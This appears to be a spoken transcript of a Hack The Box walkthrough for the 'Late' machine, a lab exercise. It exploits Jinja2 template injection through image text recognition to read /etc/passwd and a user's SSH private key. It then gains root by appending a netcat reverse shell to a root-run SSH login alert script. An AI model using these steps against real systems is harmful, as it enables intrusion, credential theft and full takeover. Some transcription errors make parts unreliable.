Well, hello everyone guys, this is Mohammad Badruddin and today we are going to solve another machine from Hackthebox. The machine difficulty level is easy and this machine is pretty straightforward and you will know everything once you go in a flow. So first and foremost, we will start with the reconnaissance phase where we scan the target for the published ports and the services. So I'm going to start with nmap space -s capital C for the default scripts, space -s capital V for the version enumeration, and the IP of the target machine is 10.10.11.156, and I'm gonna save the scan results in default.nmap. So to save the time, I already ran the scan, so I'm just going to show you the scan results. And as you can see here, two ports are open, port number 22 and port number 80. So I'm going to copy this and paste it with me. So port number 22 open and default for SSH, and the version of SSH here is OpenSSH 7.6 P1. And the second port, which is port number 80, this is TCP port. Port state is open and default for HTTP. The service running on that port is NGINX 1.14.0 and the title is Best Online Image Tools. Fine. So let's see what's running on port number 80. So once you access port number 80, you will find one web application running here, which is late. So there is index.html. This is home, and everything leads you to index.html. This one contact.html, and this is the contact page. Fine, you can contact, but nothing is going to work here. So go back to home and just scroll down, and once you scroll down, you will see few features of this application. So popular features of online photo editor. So actually this website is for a web application, and that web application provides online photo editor editing features. So what are the features here? We always need to see every small point whenever you are going to enumerate, because enumeration is the key. So as much information as you have as more attack surface. So the online image editor is the easiest method to edit your images in a clean and fast manner. It works on all format like PNG, JPG, JPEG, and you can even upload your own fonts to the editor and use them to add text to a photo with your own fonts. And did I already mention that it is 100% free to use. Editing photo has never been so easy. The online image editor lets you edit photo in a clean and fast manner, blah blah blah. So it could be useful information that what are the formats, what are the extension of the image file are allowed. Fine. So here also nothing much interesting. So with the text tool, you can add text to your images, also add text to animated images is a simple and fast. With extra options, you can add a border around your text and blah blah blah. Frequently asked questions: what's photo editing? How can I edit photos online for free? So with late free online photos, and once I hover my cursor on this link, on the left hand bottom corner, you can see there is a subdomain which is images.late.htb. So let's go to view the page source, and here go down, and this one. So we found a new subdomain which is images.late.htb, and I already created this record in my etc host file. So if I show you grep late.htb and /hosts, so as you can see, images.late.htb and late.htb, both domain and subdomain already added in the etc host file. So let's go. We will try to access this link. So as you can see, this is image reader, and convert images to text with Flask. So Flask is a framework. Okay. And that framework, once I see that framework, the first thing comes into my mind, which is server side template injection, SSTI vulnerability. We will see that in a minute. If you want to turn an image into a text document, you came to the right place. Convert your image now. So what this application is doing, we need to upload our image file and it will convert that file into the text format. So we will try first and we will see what's going on. And I already opened up the burp suite, so just enable the burp proxy on your browser and browse the image. Go to the image, this is the image file, and scan image. So once the scan is completed, it is giving us the output file, which is results.txt. So if I open up this file with mousepad, so as you can see, it's giving us nothing, but this is paragraph tag. So this is the request for the scan, and this is the image file. And basically whatever text message is there in the image file, it is going to give us in between the paragraph tags. Fine. So if I create one image file, let's see, this is test image text. Fine. And what I'm going to do here is I'm going to take a screenshot. So okay, and just take this and save it into as image.png. Save that. So come back here and open image.png, and as you can see, this is image, but it contains some text, some useful text, right, which is human readable. So if I go back to the web application to convert the image to text and browse the image from htb late image.png and scan the image again, go to the burp suite, and it is again giving us some results. So this time let's open up this one, and as you can see, this time the result file, which is text file containing this message what we have in the image. Fine. So this is confirmed that this web application is working properly, and if there is any text in the image, it is going to give you the output file with that text within the HTML p tags. Close the burp proxy. And what I'm going to do here, because Flask actually uses the template engine to actually render the pages. Okay, and most of the time this server-side template injection vulnerability occurs in a specific condition when the user input is directly go to the template engine, right? So whatever input user provided, that data is directly embedded into a template, and then it is interpreted by the template engine, and this allows attacker or threat actor to inject arbitrary code to manipulate the template engine. That's it. So what I'm going to do here, the first and foremost thing, come here, let's say payload all the things. Did I search? I write, actually it should be payload all the things. So go here and here we need to search server-side template injection, which is this, and go directly to the Jinja 2. So basic injection is there. You can test this application whether it is vulnerable or not. So in my mind, what I'm going to do here, instead of this, I'm gonna let's say 10 into 8. So 10 into 8 is equal to 80. So if server-side template injection vulnerability exists, we will get 80. So again, come here to the screenshots and okay, and just take this, okay, and let's say image2.png, save it and go back to the application to convert the image into text, and we need to choose image2 and just scan the image. So this time I'm going to save the file. Come here, open that, Control X and paste that here, open this file, and as you can see 10 into 8 is equal to 10 multiplied by 8 is equal to 80. So that means this web application is vulnerable to server-side template injection. Now how we can exploit those vulnerabilities? So for this I open that payload all the things so that we can see we can try multiple things. Okay, so the first thing we can use is we can try to read the system files. So it could be the let's take this one, copy, come back here, come here, just delete all these files. Okay, come back here, and instead of that paste that, fine, and just take the screenshot. Okay, and save it as image.png, and here actually we are going to try to read etc passwd file. So let's see the image is there or not. So as you can see, this is the image, and this one will not work. I will tell you why. Okay, but let's try. Come here, browse image.png, scan image, and this will give you this error. So once I was doing that machine, I got stuck for a bit on this error, and later I realized this problem is coming because of this. Actually there are two underscore signs, but if you see here, there is no separation between two underscores, and that's why the application is not able to identify which sign is this, right? So what you need to do is you need to let's try some fonts so that there will be some kind of separation, so that you can identify that there are two underscore and application also identify that there are two underscores. So the best one is hacker regular, select, and now as you can see, you can clearly see there are two underscores. One is this and another one is this. Now again I'm going to delete this image, come back here, take the screenshot, as simple as that, fine, and this is gonna be image.png, save it, go back to the application, back, and browse again image.png and just scan image. Okay, now we can directly open this. So that's it. We got the etc passwd file, all the contents are there, and we can easily read this file. Save as desktop htb late, let's say results passwd.txt, hit enter. Okay, now as you can see here, there are two users, right? So I'm going to just delete this and delete that. Save it. Now come back here and we are going to say grep /bin/bash, fine, from passwd.txt file, and there are two users, those can run bin bash. We can read files. So what are the files we can read? We can also read the application files if there is any database configuration file, so we can try to read that database configuration file where we can get the credentials for the database. And if there is no database configuration file, we can try to read SSH file, because the SSH port is open, so maybe that service account user have the IDRSA key, so we can read that. And this is gonna be super easy. Just here what we need to do is, let's say home /svc _acc .ssh /id_rsa, and just take the screenshot. And before, yeah, okay, come here, screenshot, okay, and take the screenshot. Fine, just okay, image 2, fine, go back to the application, browse image 2 and just scan it. There is something messed up. Home svc .ssh id_rsa, that's correct. Let me check the image, maybe there is something. And yeah, this is the problem because the cursor is there. So let's delete that, and again we can go and take the screenshot again. Okay, image2.png, go back to the application, back, image2.png, scan image, and this time, yeah, this is the IDRSA key. So what I'm going to do here is just take this out and take this out and save it as desktop htb late and id_rsa, not here, it should be here, id_rsa, fine, save that and come here, we have the IDRSA key. Now we are few steps away to get the user. So change mode, and 600 we need to change the permission of IDRSA key. That's done. Now we just need to make SSH as service account using IDRSA key. So svc_acc, this is the username, late.htb, and hit enter. That's it. We are user, ls space -la, and there is first flag which is user.txt. Fine. So clear that, and there is something interesting I see And yeah, this directory seems a bit interesting, so I just want to explore a bit. ls space hyphen la app main.py. Okay, web server gateway interface .py. Fine. So this is the application directory basically. So everything inside app/uploads, all the files should be here, and these are the templates. So if I show you templates, so this is the index.html template, this is result.html template, footer, and everything is in the main.py, right? So but now the thing is, we need to escalate our privileges from this service account to root. So the first thing, uname space hyphen a, which is Linux 8.4.15.0 175 generic. This is Ubuntu. Okay, netstate space hyphen tlpn to see how many ports are there. There is one port 8000, which is interesting. Maybe there is something running on that port. Actually, the better thing is cd desktop htb late clear ssh space hyphen I and idrsa svc underscore acc. Come on, yeah. So netstate space hyphen tlpn. So there is one port which is port number 8000. This is locally published. I want to see what's running on that port. So http://127.001:8000. If you want to turn an image into text, you came to the right place. You came to the right place. Yeah, the same application is running on port number 8000. So okay, clear. Let's try find space hyphen permission, and we are going to see if there is SUID bit set on all these seems approximately normal. One more thing, I want to check whether this user is a member of any group or not. No group is there. Okay, so psaux ww, what processes are running. So it's always good to do some enumeration manually. There is nothing interesting. Okay, clear again, and I did not see the cron job. So cat etc cron tab. Is there anything? Nothing interesting. Okay, clear that again. Let's try to here. I'm gonna start the Python 3 web server, http://server on port number 80, and come here, cd /dev/shm and wget http://10.10.14.49, that is my IP, and pspy64. So pspy is done. I'm gonna try both pspy and both of these things here. from here I'm gonna exit, because I want you to see both of these terminal simultaneously. I'm going to make one more connection here as service account. Okay, so chmod plus x pspy64 clear, and just run the pspy64 here. Let's see what we will get here. So this one will give us the real-time processes. So this is inside root, there is directory scripts, and inside that scripts directory there is one file which is cron.sh. so this file is executed as bash and as c, means sh. Then it is going to change the permission, and it is adding the execute permission to ssh alert.sh, and this is running as root because the UID is 0. So I want to see that, and the path of this file is that. So copy this and come here, cat, and paste that. And here few more things are going on. So it is going to copy from the root scripts directory, it is going to copy this ssh alert.sh bash file from the root scripts to the user local sbin, and then it is going to change the permission to execute, and then remove anything inside the upload directory in the svc user account home directory. Okay, so let's see what's in that file. So this is the bash file, recipient root. That means it is sending an email to the root. Subject is email from server login ssh alert. Fine. And the information it is sending, the username, IP host, service, TTY, date, and or machine information. So basically this script is sending a SSH alert to the root via email. Fine. So, and this is the bash file. We can inject command in the last of this file. So whenever this loop is going to execute, after finishing this loop, it is going to execute our command, right? So let's try. I don't need this here. Clear. Come here. Pen test monkey. One liner reverse shell. Okay. And one thing, which NC is there, netcat, yeah. So I'm going to use this one. Copy. First we will try this and we will see whether it's working or not. So come here and paste that. So we need to change the IP. So my IP is 14.49 and we need to change the port. Let's say port 9090. And what we need to do here is we are going to, but one thing which is very, very important before how we will write here anything if we have the right access only. So first of all, we need to see whether we have write permission on it or not. because we see in the cron job that there is execution permission. So owner is SVC, user and okay, group is SVC. So we have all the permissions. ls attr. Okay, I need this command. Come on. So ls attr list the attribute of user local sbin and sshler.sh. So there is a huge difference between both of these output. So if you see the attribute, you will know that you can only append into this file. You cannot write into this file, but you can append. The second permission you have is to execute. You can execute this. And here you can see we have every permission. If I also see, because here you can see it's saying we are the user and we are the group, we are the owner. But there is nothing. Okay, so from here we know that we can append into this file, not write, we can append. So come back here. Okay, so we will echo this whole payload. We cannot write, we can append. So for appending, I'm using these two arrow sign. Okay, where to user local sbin, and inside sbin there is ssh-alert.sh. this is the file name, right? ssh-alert.sh. and because according to the file, whatever user local sbin ssh. So if you see the content of this file, whenever any login attempt occur, it is going to execute this script, this loop, and send a mail of that login event to the root user, root email, right? So what I need to do is I'm going to take the same payload and just paste that here, and from this I'm going to make SSH, and here I'm going to listen on port number 9090. Fine. So everything is set up. Just hit enter here in this terminal and come here, try to access SSH, and as we hit enter here, you can see here we got the reverse shell. So ID, and we are root. So cd/root ls space -la, and you can see we have here root.txt. So cat root.txt, hit enter, and this is the root flag. Further we can go and see what are the scripts inside scripts directory. So stripts. So there is cron.sh and ssh alert.ssh. Clear. So export term is equal to xterm. Let's see clear work or not. Yeah, this time work. So let's see what's strip scripts or script cron.sh. So as you can see, these are the commands or the process we see before in the PSPY, right? So that's it for this video. If you like the content, please like, subscribe and share. See you in the next video. Bye.